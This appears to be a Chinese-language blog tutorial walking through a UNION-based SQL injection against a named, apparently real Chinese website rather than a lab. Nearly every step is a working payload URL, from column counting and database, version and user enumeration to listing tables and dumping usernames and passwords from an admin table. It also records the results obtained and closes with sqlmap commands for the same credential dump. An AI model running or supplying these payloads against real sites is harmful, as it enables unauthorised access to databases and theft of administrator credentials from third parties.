目标站:http://www.chncc.com/shownews_zhxw.php?id=2745
1、先检查是否存在sql注入
2、一般用 ' " ) 等符号来闭合,再用%23(即#)来注释后面语句。
3、使用order by n 猜字段,再用union select 1,2,3 ...n%23来查询
http://www.chncc.com/shownews_zhxw.php?id=2745 order by 4 #5就报错了,n不能为0,数据库是1列开始的,没有0列
4、匹配字段
and 1=1 union select 1,2,n.......
列如:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=1 union select 1,2,3,4

5、爆字段位置
and 1=2 union select 1,2,n.......
列如:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select 1,2,3,4 #字段位置:1,4,2

6、利用内置函数查数据库信息
database() 查询当前数据库
列如:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select database(),2,3,4
根据以上我们获得的信息:当前数据库chncc #database()函数一定要放在爆出来的字段位置上

version()查询当前mysql版本
列如:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select database(),2,3,version()
根据以上我们获得的信息:当前数据库chncc 数据库版本:5.1.51-community

user()查询当前数据库用户名
列如:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select database(),user(),3,version()
根据以上我们获取的信息:当前数据库chncc 数据库版本:5.1.51-community 用户名:chncc@localhost

7、group_concat()函数
列出全部数据库:information_schema.schemata这表的shcema_name存储数据库名
information_schema.tables 这表存放表名table_name存放表名table_schema存储表名所在的数据库名
information_schema.columns这表存在列名column_name存放列名table_name存放列所在的表名table_schema存在所在的数据库名
获取所有的数据库名
列如:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata
数据库:chncc information_schema
用group_concat(table_name)替换有漏洞的字段,然后后面加frominformation_schema.tables where table_schema=database()
列如:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns #列如出数据库:information_schema里的全部表
CHARACTER_SET_NAME,DEFAULT_COLLATE_NAME,DESCRIPTION,MAXLEN,COLLATION_NAME,CHARACTER_SET_NAME,ID,IS_DEFAULT,IS_COMPILED,SORTLEN,COLLATION_NAME,CHARACTER_SET_NAME,TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME,ORDINAL_POSITION,COLUMN_DEFAULT,IS_NULLABLE,DATA_TYPE,CHARACTER_MAXIMUM_LENGTH,CHARACTER_OCTET_LENGTH,NUMERIC_PRECISION,NUMERIC_SCALE,CHARACTER_SET_NAME,COLLATION_NAME,COLUMN_TYPE,COLUMN_KEY,EXTRA,PRIVILEGES,COLUMN_COMMENT,GRANTEE,TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME,PRIVILEGE_TYPE,IS_GRANTABLE,ENGINE,SUPPORT,COMMENT,TRANSACTIONS,XA,SAVEPOINTS,EVENT_CATALOG,EVENT_SCHEMA,EVENT_NAME,DEFINER,TIME_ZONE,EVENT_BODY,EVENT_DEFINITION,EVENT_TYPE,EXECUTE_AT,INTERVAL_VALUE,INTERVAL_FIELD,SQL_MODE,STARTS,ENDS,STATUS,ON_COMPLETION,CREATED,LAST_ALTERED,LAST_EXECUTED,EVENT_COMMENT,ORIGINATOR,CHARACTER_SET_CLIENT,COLLATION_CONNECTION,DATABASE_COLLATION,FILE_ID,FILE_NAME,FILE_TYPE,TABLESPACE_NAME,TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME,LOGFILE_GROUP_NAME,LOGFILE_GROUP_NUMBER,ENGINE,FULLTEXT_KEYS,DELETED_ROWS

列出database()里面的表
列如:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select 1,group_concat(distinct table_name),3,4 from information_schema.columns where table_schema=database()
表名:adminuser_stat,company,link,news,newsimg,popeuser,price
或者:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()
再或者:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='chncc'

9、获取adminuser_stat里面的全部列
列如:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='chncc' and table_name= 'adminuser_stat'

10、最后一步爆数据
http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select 1,group_concat(user,0x3a,pwd),3,4 from chncc.adminuser_stat #:通过hex编码变成了3a
或者:http://www.chncc.com/shownews_zhxw.php?id=2745 and 1=2 union select 1,group_concat(user,':',pwd),3,4 from chncc.adminuser_stat


11、sqlmap的使用方法:
root@instance-ce9256h8:~# sqlmap -u http://www.chncc.com/shownews_zhxw.php?id=2745
root@instance-ce9256h8:~# sqlmap -u http://www.chncc.com/shownews_zhxw.php?id=2745 --dbs
root@instance-ce9256h8:~# sqlmap -u http://www.chncc.com/shownews_zhxw.php?id=2745 --current-db
root@instance-ce9256h8:~# sqlmap -u http://www.chncc.com/shownews_zhxw.php?id=2745 --tables -D chncc
root@instance-ce9256h8:~# sqlmap -u http://www.chncc.com/shownews_zhxw.php?id=2745 --columns -T adminuser_stat -D chncc
root@instance-ce9256h8:~# sqlmap -u http://www.chncc.com/shownews_zhxw.php?id=2745 --dump -C user,pwd -T adminuser_stat -D chncc

0

正因为生来什么都没有,因此我们能拥有一切。